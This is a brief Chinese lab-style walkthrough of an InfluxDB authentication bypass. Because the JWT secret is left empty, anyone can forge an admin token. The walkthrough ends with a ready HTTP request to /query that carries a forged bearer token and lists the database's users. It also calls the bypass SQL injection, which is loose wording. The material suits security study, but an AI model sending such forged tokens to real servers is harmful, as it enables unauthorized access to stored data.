数据库安全

InfluxDB

InfluxDB是一个go语言开发的时间序列数据库，在用户开启了认证，但是没有设置SharedSecret，jwt的认证密钥为空字符串，攻击者可伪造任意用户进行sql注入

拉取环境

 访问/query，提交POST数据，这是登录后才能进行的查询操作，所以显示认证失败

我们可以使用 JSON Web Tokens - jwt.io 生成一个带有空密钥的有效 JWT 令牌：

 

这是原来抓取的数据包，可以直接替换掉

 

这里直接提供payload，IP换成自己的即可

POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoyOTg2MzQ2MjY3fQ.LJDvEy5zvSEpA_C6pnK3JJFkUKGq9eEi8T2wdum3R_s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users